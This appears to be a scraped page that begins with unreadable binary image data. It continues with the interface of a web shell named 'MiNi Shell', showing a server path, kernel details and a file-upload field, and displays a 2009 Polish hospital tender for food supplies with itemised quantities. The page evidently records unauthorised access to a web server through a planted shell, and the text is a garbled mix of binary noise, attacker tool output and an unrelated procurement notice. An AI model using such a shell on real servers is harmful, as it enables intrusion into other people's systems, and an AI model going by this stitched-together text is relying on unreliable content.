JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090602/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20090602/174874-N-2009.html

<p class="kh_header"><b>Brzozów: DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH, MIĘSA DROBIOWEGO ORAZ WYROBÓW Z DROBIU, MIĘSA WOŁOWEGO ORAZ WYROBÓW Z WOŁOWINY I WIEPRZOWINY, ARTYKUŁÓW SPOZYWCZYCH MROŻONYCH</b><br>
<b>Numer ogłoszenia: 174874 - 2009; data zamieszczenia: 02.06.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Szpital Specjalistyczny w Brzozowie. Podkarpacki Ośrodek Onkologiczny im. Ks. Bronisława Markiewicza , ul. Ks. J. Bielawskiego 18, 36-200 Brzozów, woj. podkarpackie, tel. 013 4309587, faks 013 4309587.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.szpital-brzozow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH, MIĘSA DROBIOWEGO ORAZ WYROBÓW Z DROBIU, MIĘSA WOŁOWEGO ORAZ WYROBÓW Z WOŁOWINY I WIEPRZOWINY, ARTYKUŁÓW SPOZYWCZYCH MROŻONYCH.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DOSTAWA ARTYKUŁÓW SPOŻYWCZYCH, MIĘSA DROBIOWEGO ORAZ WYROBÓW Z DROBIU, MIĘSA WOŁOWEGO ORAZ WYROBÓW Z WOŁOWINY I WIEPRZOWINY, ARTYKUŁÓW SPOZYWCZYCH MROŻONYCH.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> NIE WYMAGANE<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O ZAMÓWIENIE MOGĄ SIĘ UBIEGAĆ WYKONAWCY, KTÓRZY SPEŁNIAJĄ WARUNKI ZAWARTE W ART. 22 UST. 1 USTAWY Z DNIA 29 STYCZNIA 2004 R. PRAWO ZAMÓWIEŃ PUBLICZNYCH, CZYLI POSIADAJĄ UPRAWNIENIA DO WYKONYWANIA OKREŚLONEJ DZIAŁALNOŚCI LUB CZYNNOŚCI, POSIADAJĄ NIEZBĘDNĄ WIEDZĘ I DOŚWIADCZENIE ORAZ DYSPONUJĄ POTENCJAŁEM TECHNICZNYM I OSOBAMI DO WYKONANIA ZAMÓWIENIA LUB PRZEDSTAWIĄ PISEMNE ZOBOWIĄZANIE INNYCH PODMIOTÓW DO UDOSTĘPNIENIA POTENCJAŁU TECHNICZNEGO I OSÓB ZDOLNYCH DO WYKONANIA ZAMÓWIENIA, ZNAJDUJĄ SIĘ W SYTUACJI EKONOMICZNEJ I FINANSOWEJ ZAPEWNIAJĄCEJ WYKONANIE ZAMÓWIENIA ORAZ NIE PODLEGAJĄ WYKLUCZENIU Z POSTĘPOWANIA O UDZIELENIE ZAMÓWIENIA PUBLICZNEGO. ZAMAWIAJĄCY OCENY DOKONA NA PODSTAWIE WYMAGANYCH PRZEZ ZAMAWIAJACEGO DOKUMENTÓW..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. OŚWIADCZENIE O SPEŁNIANIU WARUNKÓW WYMAGANYCH OD WYKONAWCÓW BIORĄCYCH UDZIAŁ W NINIEJSZYM POSTĘPOWANIU NA PODSTAWIE ART. 44 USTAWY PRAWO ZAMÓWIEŃ PUBLICZNYCH. 2. WSKAZANIE PRZEZ WYKONAWCĘ TYCH CZĘŚCI ZAMÓWIENIA, KTÓRYCH REALIZACJĘ ZAMIERZA POWIERZYĆ PODWYKONAWCOM. 3. JEŻELI WYKONAWCA MA SIEDZIBĘ LUB MIEJSCE ZAMIESZKANIA POZA TERYTORIUM RP, A W KRAJU JEGO MIEJSCA ZAMIESZKANIA LUB SIEDZIBY NIE SĄ WYDAWANE DOKUMENTY PODMIOTOWE OKREŚLONE W PUNKCIE 2 WYKONAWCA SKŁADA DOKUMENT LUB DOKUMENTY WYSTAWIONE W KRAJU W KTÓRYM MA SIEDZIBĘ LUB MIEJSCE ZAMIESZKANIA, ZGODNIE Z TREŚCIĄ PARAGRAFU 2 ROZPORZĄDZENIA PREZESA RADY MINISTRÓW Z DNIA 19 MAJA 2006 R. W SPRAWIE RODZAJÓW DOKUMENTÓW JAKICH MOŻE ŻĄDAĆ ZAMAWIAJĄCY OD WYKONAWCÓW, ORAZ FORM W JAKICH TE DOKUMENTY MAJĄ BYĆ SKŁADANE. JEŻELI W KRAJU POCHODZENIA OSOBY LUB W KRAJU W KTÓRYM WYKONAWCA MA SIEDZIBĘ LUB MIEJSCE ZAMIESZKANIA, NIE WYDAJE SIĘ DOKUMENTÓW O KTÓRYCH MOWA W PUNKCIE 2 ZASTĘPUJE SIĘ JE DOKUMENTEM ZAWIERAJĄCYM OŚWIADCZENIE ZŁOŻONE PRZED NOTARIUSZEM, WŁAŚCIWYM ORGANEM SĄDOWYM, ADMINISTRACYJNYM ALBO ORGANEM SAMORZĄDU ZAWODOWEGO LUB GOSPODARCZEGO, ODPOWIEDNIO KRAJU POCHODZENIA OSOBY LUB KRAJU, W KTÓRYM WYKONAWCA MA SIEDZIBĘ LUB MIEJSCE ZAMIESZKANIA..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.szpital-brzozow.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SZPITAL SPECJALISTYCZNY W BRZOZOWIE PODKARPACKI OŚRODEK ONKOLOGICZNY IM. KS. B. MARKIEWICZA, 36-200 BRZOZÓW, UL. KS. J. BIELAWSKIEGO, BUDYNEK G ADMINISTRACJA, POKÓJ NR 10..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.06.2009 godzina 12:00, miejsce: SZPITAL SPECJALISTYCZNY W BRZOZOWIE PODKARPACKI OŚRODEK ONKOLOGICZNY IM. KS. B. MARKIEWICZA, 36-200 BRZOZÓW, UL. KS. J. BIELAWSKIEGO, BUDYNEK G ADMINISTRACJA, SEKRETARIAT..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> I ARTYKUŁY SPOŻYWCZE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> ARTYKUŁY SPOŻYWCZE
1.	BISZKOPTY GURGULA 140 g - 150 SZT
2.	BUDYŃ ŚMIETANKOWY 65 g - 80 SZT
3.	CHRUPKI KUKURYDZIANE 80 g - 400 SZT
4.	CHLEB RYŻOWY 135 g - 20 SZT
5.	CUKIER BIAŁY PACZKOWANY 1 KG - 2000 KG
6.	CUKIER WANILIOWY 32 g - 30 SZT
7.	CYNAMON MIELONY 20 g - 15 SZT
8.	CZEKOLADKI SKAWA 16 g - 200 SZT
9.	DZEM TRUSKAWKOWY 270 g - 150 SZT
10.	DZEM WIELOSMAKOWY 25 g - 3000 SZT
11.	GROSZEK KONSERWOWY 850 g - 80 SZT
12.	HERBATA SAGA GRANULOWANA 90 g - 1500 SZT
13.	HERBATNIKI SZKOLNE - 200 SZT
14.	KAKAO 200 g - 70 SZT
15.	KONCENTRAT BARSZCZU KRAKUS - 70 SZT
16.	KWASEK CYTRYNOWY 20 g - 800 SZT
17.	KAWA INKA 150 g - 180 SZT
18.	KISIEL TRUSKAWKOWY 38 g - 200 SZT
19.	KLEIK RYŻOWY 180 g - 150 SZT
20.	KMINEK 20 g - 100 SZT
21.	KONCENTRAT POMIDOROWY PUDLISZKI 200 g - 400 SZT
22.	SZPROT W OLEJU 170 g - 300 SZT
23.	SZPROT W POMIDORACH 170 g - 300 SZT
24.	KAWA JĘCZMIENNA 500 g - 300 KG
25.	KASZA KUKURYDZIANA DROBNA 500 g - 200 KG
26.	KASZA MANNA 500  g - 400 KG
27.	PRZYPRAWA KUCHAREK 75 g - 200 SZT
28.	PRZYPRAWA KUCHAREK 200 g - 200 SZT
29.	LIŚĆ LAUROWY 6 g - 60 SZT
30.	MAJONEZ RZYMSKI 260 g - 200 SZT
31.	MAJERANEK 15 g - 15 SZT
32.	MAKARON GRUBY ŚWIDERKI 400 g - 300 SZT
33.	MAKARON NITKA 400 g - 1200 SZT
34.	MĄKA ZIEMNIACZANA 500 g - 100 KG
35.	MIÓD 25 g - 3000 SZT
36.	MLEKO NAN 350 g 1, 2, 2R, 3, 2GR - 60 SZT
37.	MLEKO W PROSZKU ŁACIATE 500 G - 100 SZT
38.	BEBIKO 350 g 1, 2, 2R, 3, 2GR - 80 SZT
39.	MUSZTARDA STOŁOWA 175 g - 200 SZT
40.	OCET 0,5 L - 180 SZT
41.	OGÓRKI KONSERWOWE 0,9 L - 200 SZT
42.	OLEJ UNIWERSALNY 1 L - 400 SZT
43.	PALUSZKI LAJKONIK 70 g - 200 SZT
44.	PAPRYKA MIELONA SŁODKA 20 g - 40 SZT
45.	PIEPRZ MIELONY 20 g - 400 SZT
46.	PŁATKI KUKURYDZIANE CORN FLAKES 250 g - 800 SZT
47.	PŁATKI JĘCZMIENNE BŁYSK.  - 200 KG
48.	PŁATKI OWSIANE 500 g - 200 KG
49.	PRZYPRAWA DO ZUP MAGA 200 g - 80 SZT
50.	PRZYPRAWA DO ZUP MAGA 1L - 280 SZT
51.	PRECLE RZESZOWSKIE - 80 SZT
52.	PŁATKI RYŻOWE BŁYSKAWICZNE - 200 KG
53.	PIEPRZ ZIOŁOWY 20 g - 250 SZT
54.	ROSÓŁ DROBIOWY 120 g WINIARY - 250 SZT
55.	SOK PYSIO SMAK DOWOLNY Z DODATKIEM MARCHEWKI 300 ML - 250 SZT
56.	SÓL JODOWANA PACZKA 1 KG - 600 KG
57.	RYŻ BIAŁY 1 KG - 1000 KG
58.	SUCHARY DELIKATESOWE 290 g - 80 SZT
59.	WAFELEK GRZESIEK W CZEKOLADZIE 39 g - 200 SZT
60.	ZUPA PIECZARKOWA AMINO 59 g - 200 SZT
61.	ZIELE ANGIELSKIE 15 g - 60 SZT
62.	MARGARYNA ZWYKŁA OLVIT 250 g - 700 SZT
63.	MĄKA POZNAŃSKA 500 1 KG - 1500 KG.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> II MIĘSO DROBIOWE ORAZ WYROBY Z DROBIU.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	UDKA Z KURCZAKA EXTRA - 1500 KG
2.	FILET Z INDYKA BEZ KOŚCI - 350 KG
3.	SZYNKA DROBIOWA BIAŁA - 300 KG
4.	PASZTET DROBIOWY PROCHOWICKI 135 g - 1500 SZT
5.	UDZIEC Z INDYKA BEZ KOŚCI - 500 KG.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> III MIĘSO WOŁOWE ORAZ WYROBY Z WOŁOWINY I WIEPRZOWINY.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	WOŁOWINA Z KOŚCIĄ /ANTRYKOT/ - 1500 KG
2.	KIEŁBASA SZYNKOWA - 300 KG
3.	KIEŁBASA ZWYCZAJNA - 200 KG
4.	KOŚCI WIEPRZOWE - 400 KG
5.	PARÓWKA - 500 KG.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> IV ARTYKUŁU SPOŻYWCZE MROŻONE.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	FILET Z DORSZA I GATUNEK BEZ LODU - 700 KG
2.	FASOLKA SZPARAGOWA MROŻONA OP 2,5 KG - 300 KG
3.	KALAFIOR MROŻONY OP 2,5 KG - 200 KG
4.	MIESZANKA 7-SKŁADNIKOWA OP 2,5 KG - 60 KG.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com